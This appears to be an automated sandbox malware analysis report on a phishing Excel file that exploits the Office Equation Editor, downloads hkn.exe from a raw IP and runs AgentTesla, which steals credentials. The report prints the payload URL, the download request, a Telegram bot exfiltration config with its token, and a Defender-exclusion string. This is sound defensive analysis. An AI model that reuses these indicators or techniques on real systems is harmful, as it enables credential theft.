
Analysis Report: New Order for April#89032.xlsx

Overview

General Information

Sample Name: New Order for April#89032.xlsx
Analysis ID: 383941
MD5: d7928e685d37d907d102cecdf3d3ce8b
SHA1: 3404ab865cdfb6c4a71151f5ae7bd17b92206885
SHA256: a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
Tags: VelvetSweatshop, xlsx

Detection

AgentTesla Telegram RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Drops PE files to the user root directory
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2232 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2548 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2672 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5F968F612F82F74C96DD257793CF917D)
      • vbc.exe (PID: 2868 cmdline: C:\Users\Public\vbc.exe MD5: 5F968F612F82F74C96DD257793CF917D)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
4.2.vbc.exe.3446ec0.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
4.2.vbc.exe.3446ec0.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 198.23.174.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe

                  Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://198.23.174.104/hkn.exe; Avira URL Cloud: Label: malware
Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe; ReversingLabs: Detection: 16%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: New Order for April#89032.xlsx; ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: excel.exe; Memory has grown: Private usage: 4MB later: 74MB
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: global traffic; DNS query: name: api.telegram.org
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 149.154.167.220:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 198.23.174.104:80

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Thu, 08 Apr 2021 10:50:31 GMT
    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
    Last-Modified: Thu, 08 Apr 2021 08:14:53 GMT
    ETag: "d7200-5bf71a458267a"
    Accept-Ranges: bytes
    Content-Length: 881152
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; IP Address: 198.23.174.104
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View; JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic; HTTP traffic detected:
    GET /hkn.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 198.23.174.104
    Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: api.telegram.org
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp; String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp; String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp; String found in binary or memory: http://WrqCET.com
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://api.telegram.org
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2380259910.00000000005B7000.00000004.00000020.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/02
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/05
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmp; String found in binary or memory: https://YiNu10TJVGgbJcx5.com
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmp; String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.orgP
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp; String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr; String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: vbc.exe, vbc.exe.2.dr; String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr; String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp; String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00535404 NtQueryInformationProcess,
Source: C:\Users\Public\vbc.exe; Code function: 4_2_0053539F NtQueryInformationProcess,
                  Source: New Order for April#89032.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: hkn[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: hkn[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$New Order for April#89032.xlsx
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR157.tmp
                  Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                  Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\Public\vbc.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: New Order for April#89032.xlsx | ReversingLabs: Detection: 31%
                  Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: New Order for April#89032.xlsx | Static file information: File size 2269696 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: New Order for April#89032.xlsx | Initial sample: OLE indicators vbamacros = False
                  Source: New Order for April#89032.xlsx | Initial sample: OLE indicators encrypted = True
                  Source: C:\Users\Public\vbc.exe | Code function: 4_2_00DC858F push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exe | Code function: 4_2_00DC92FB push FFFFFFD9h; iretd
                  Source: C:\Users\Public\vbc.exe | Code function: 4_2_00536E00 pushad ; iretd
                  Source: C:\Users\Public\vbc.exe | Code function: 5_2_00DC858F push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exe | Code function: 5_2_00DC92FB push FFFFFFD9h; iretd
                  Source: initial sample | Static PE information: section name: .text entropy: 7.54549317516
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

                  Boot Survival:

                  Drops PE files to the user root directory
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
                  Source: New Order for April#89032.xlsx | Stream path 'EncryptedPackage' entropy: 7.9999090543 (max. 8.0)

                  Malware Analysis System Evasion:

                  Yara detected AntiVM3
                  Source: Yara match | File source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exe | Window / User API: threadDelayed 9672
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2556 | Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2724 | Thread sleep time: -103949s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1684 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2688 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 2960 | Thread sleep time: -480000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1900 | Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1900 | Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\Public\vbc.exe TID: 1336 | Thread sleep count: 9672 > 30
                  Source: C:\Users\Public\vbc.exe TID: 1336 | Thread sleep count: 65 > 30
                  Source: C:\Users\Public\vbc.exe TID: 1900 | Thread sleep count: 102 > 30
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 103949
                  Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 30000
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: vmware
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                  Source: New Order for April#89032.xlsx | Binary or memory string: u<qEmu
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: VMWARE
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
                  Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
                  Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
                  Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Injects a PE file into a foreign processes
                  Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000005.00000002.2380657176.0000000000E90000.00000002.00000001.sdmp | Binary or memory string: !Progman
                  Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
                  Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  Yara detected AgentTesla
                  Source: Yara match | File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
